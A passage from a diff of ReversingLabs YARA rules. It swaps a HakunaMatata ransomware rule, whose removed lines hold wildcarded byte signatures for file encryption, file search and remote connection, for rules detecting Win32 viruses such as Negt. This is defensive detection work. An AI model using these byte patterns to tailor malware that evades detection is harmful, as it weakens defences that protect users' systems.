+            ?? 83 C7 7F 6A 7F 57 FF 95 ?? ?? ?? ?? 83 C7 7F 57 6A 7F FF 95 ?? ??
+            ?? ?? 8D BD ?? ?? ?? ?? 80 BD ?? ?? ?? ?? 00 0F 84 20 03 00 00 FE 8D
+            ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? 83 C7 7F 8D 9D ?? ?? ?? ?? 53 8D 9D
+            ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 83 F8 FF 74 CA 89 85 ?? ?? ?? ?? FF
+            85 ?? ?? ?? ?? E8 C0 02 00 00 83 F8 FF 74 75 E8 70 02 00 00 85 C0 74
+            6C 8B 85 ?? ?? ?? ?? 8B 50 3C 3B 95 ?? ?? ?? ?? 73 5B 03 D0 8B 02 35
+            96 23 00 00 3D C6 66 00 00 75 4B 81 7A 4C 53 54 30 00 74 42 52 FF B5
+            ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 5A FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            E8 79 00 00 00 8F 85 ?? ?? ?? ?? 8F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            05 7E 0E 80 BD ?? ?? ?? ?? 00 0F 85 40 FF FF FF C3 57 8D BD ?? ?? ??
+            ?? B9 04 01 00 00 32 C0 F3 AA 5F FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ??
+            ?? 8D 9D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 74
+            05 E9 2A FF FF FF E9 E9 FE FF FF 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ??
+            8B 5A 3C E8 87 01 00 00 89 B5 ?? ?? ?? ?? E8 8B 01 00 00 33 DB 8B 95
+            ?? ?? ?? ?? 8B 42 3C 03 D0 0F B7 42 06 48 6B C0 28 0F B7 5A 14 83 C3
+            18 03 DA 03 C3 8B 58 10 03 58 14 03 9D ?? ?? ?? ?? 53 8B 4A 28 89 8D
+            ?? ?? ?? ?? 8B 4A 34 89 8D ?? ?? ?? ?? 8B 48 0C 03 48 10 89 8D ?? ??
+            ?? ?? 89 4A 28 8B 70 10 81 C6 ?? ?? ?? ?? 8B 5A 3C E8 1D 01 00 00 89
+            70 10 89 70 08 03 70 0C 89 72 50 81 48 24 20 00 00 A0 C7 42 4C 53 54
         }
-		$encrypt_files_p2 = {
-            8B FA 48 C1 FF ?? 48 8B C7 48 C1 E8 ?? 48 03 F8 48 85 FF 0F 8E ?? ?? ?? ?? 48 89 74
-            24 ?? 4C 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 89 44 24 ?? 4D 8B CF 4D 8B C7 48 8D 95 ?? ?? ?? ?? 33 C9 E8 ?? ?? ??
-            ?? 45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 89 74 24 ?? 4C 8D 8D ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ??
-            45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 83 EF ?? 0F 85 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 83 78 ?? ?? 0F 8C ??
-            ?? ?? ?? 41 8B C6 48 8D 1C C5 ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B 0C 18 8B
-            04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
-            ?? 75 ?? 66 C7 05 ?? ?? 05 00 ?? ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 80 35 ?? ??
-            ?? ?? ?? 80 35 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B
-            0C 18 8B 04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ??
-            ?? ?? ?? ?? 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D
+		$cmay_body_2 = {
+            30 00 5B B9 ?? ?? ?? ?? FC 8B FB 8D B5 ?? ?? ?? ?? F3 A4 FF B5 ?? ??
+            ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? FF 95 ?? ?? ?? ?? C3 50 51 B9 05 00 00 00 8B 44 24 2E 25 00
+            00 FF FF 66 81 38 4D 5A 74 09 2D 00 00 01 00 E2 F2 EB 06 89 85 ?? ??
+            ?? ?? 59 58 74 01 F9 C3 56 8B 95 ?? ?? ?? ?? 8B 72 3C 03 F2 8B 76 78
+            03 F2 83 C6 1C AD 03 C2 89 85 ?? ?? ?? ?? AD 03 C2 89 85 ?? ?? ?? ??
+            AD 03 C2 89 85 ?? ?? ?? ?? 5E 57 E8 16 00 00 00 5F 89 07 83 C7 04 80
+            3E 88 C7 85 ?? ?? ?? ?? 00 00 00 00 75 E5 C3 8B DE 80 3E 00 74 03 46
+            EB F8 46 8B CE 2B CB 8B F3 8B BD ?? ?? ?? ?? 57 8B 3F 03 FA 51 F3 A6
+            74 0F 8B F3 59 5F 83 C7 04 FF 85 ?? ?? ?? ?? EB E7 59 5F 8B 85 ?? ??
+            ?? ?? D1 E0 03 85 ?? ?? ?? ?? 33 DB 66 8B 18 C1 E3 02 03 9D ?? ?? ??
+            ?? 8B 1B 03 DA 8B C3 C3 50 52 33 D2 8B C6 F7 F3 2B DA 03 F3 5A 58 C3
+            8B 85 ?? ?? ?? ?? 6A 00 50 6A 00 6A 04 6A 00 FF B5 ?? ?? ?? ?? FF 95
+            ?? ?? ?? ?? 85 C0 74 1E 89 85 ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 02 FF
+            B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 75 02 33 C0 89 85 ?? ?? ?? ??
+            C3 33 C0 50 68 80 00 00 00 6A 03 50 40 50 68 00 00 00 C0 8D B5 ?? ??
+            ?? ?? 56 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C3 85 ED 0F 84 2A 04 00
+            00 33 C0 05 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_shares ) )
+		uint16( 0 ) == 0x5A4D and ( $cmay_body_1 at pe.entry_point ) and $cmay_body_2
 }
-rule REVERSINGLABS_Win32_Ransomware_Hakunamatata : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Win32_Virus_Negt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects HakunaMatata ransomware."
+		description = "Yara rule that detects Negt virus."
 		author = "ReversingLabs"
-		id = "17438fcd-7a51-5fb6-96ac-38523bc1744f"
-		date = "2020-11-11"
-		modified = "2020-11-11"
+		id = "80e83105-dd98-5fad-9119-f851ec3199af"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.HakunaMatata.yara#L1-L373"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e363ff93fce286d60a3f5ea20ba3ec03564b7a5321c3f6448cc82187f23e8a9f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/virus/Win32.Virus.Negt.yara#L3-L94"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "43057ef111fc505678606386c8d428653da391f4b65844d81479ca05e3517346"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HakunaMatata"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Negt"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$encrypt_files = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
-            85 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 14 24 89 C1 E8 ??
-            ?? ?? ?? 83 EC ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B
-            45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83
-            EC ?? 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B
-            45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 54 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ??
-            01 D0 01 C0 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ??
-            ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24
-            A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8B 45 ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ??
-            39 C8 76 ?? 89 C8 89 DA 89 45 ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ??
-            89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ??
-            83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89
-            54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C6 8B 45 ?? 89 C1 BB
-            ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 CF 31 C7 89 7D ?? 89 DF 31 D7 89 7D ?? 8B 45 ?? 0B
-            45 ?? 85 C0 0F 94 C0 0F B6 C8 8B 55 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89
-            F0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24
-            A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 8B 45 ?? 85 C0
-            79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ??
-            8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0
-            83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ??
-            8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89 45 ?? 89 55 ?? 8B 45 ?? BA ?? ??
-            ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83 F6 ?? 89 75 ?? 89 D0 80 F4 ?? 89
-            45 ?? 8B 55 ?? 8B 4D ?? 89 C8 09 D0 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ??
-            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89
-            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
-            ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83
-            EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5F 5D C2
-        }
-		$encrypt_files_2 = {
-            55 89 E5 56 53 81 EC ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 89 85
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? 84 C0 0F 84 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF
-            D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89
-            44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95 C0 84 C0 0F 84
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ??
-            8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C3 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C6 89 F0 09 D8 85 C0
-            74 ?? 8B 45 ?? 8B 55 ?? 3B 95 ?? ?? ?? ?? 72 ?? 3B 95 ?? ?? ?? ?? 77 ?? 3B 85 ?? ??
-            ?? ?? 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ??
-            89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? 89 44 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ?? 01 D0 01 C0 89
-            45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89
-            44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ??
-            FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
-            ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ?? 39 C8 76 ?? 89
-            C8 89 DA 89 45 ?? 8B 4D ?? 8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89
-            4C 24 ?? 89 54 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94
-            C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89 54 24 ?? 89 04
-            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B 55 ??
-            89 CE 31 C6 89 B5 ?? ?? ?? ?? 89 DE 31 D6 89 B5 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5
-            ?? ?? ?? ?? 89 D8 09 F0 85 C0 0F 94 C0 88 45 ?? 8B 55 ?? 0F B6 4D ?? 8B 5D ?? 8B 45
-            ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ??
-            ?? FF D0 89 45 ?? 8B 45 ?? 85 C0 79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ??
-            8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 45
-            ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ??
-            ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89
-            45 ?? 89 55 ?? 8B 45 ?? BA ?? ?? ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83
-            F6 ?? 89 B5 ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5 ??
-            ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ??
-            ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 2B
-            45 ?? 1B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B
-            55 ?? 39 D3 72 ?? 39 D3 77 ?? 39 C1 76 ?? 89 C1 89 D3 89 4D ?? 8B 45 ?? C7 44 24 ??
-            ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24
-            A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B
-            45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ??
-            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? 8B 45 ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ?? 29 C8 19 DA 89 45 ?? 89 55 ?? 8B
-            45 ?? 8B 55 ?? 89 C3 80 F7 ?? 89 9D ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B
-            9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B
-            45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8
-            ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ??
-            FF D0 83 EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5D C2
-        }
-		$search_files = {
-            E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 95 C0 88 45 ?? 80 7D ?? ?? 74 ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ??
-            83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 83 45 ?? ?? EB ?? A1 ??
-            ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ?? ?? ?? 83 EC
-            ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8
-            ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 89
-            C1 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            89 1C 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8
-            ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 89 C1
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 90 8D 85
-            ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95
-            C0 84 C0 74 ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ??
-            ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ??
-            ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7
-            04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
-            ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 05 ??
-            ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0
-            74 ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C2 8B 85 ?? ?? ?? ?? 89 14 24 89 C1
-            E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 C2 8B 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8
-            ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
-        }
-		$search_files_2 = {
-            FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ??
-            83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B
-            00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ??
-            ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ??
-            ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
-            89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8
-        }
-		$remote_connection = {
-            55 89 E5 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 44 24 ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8
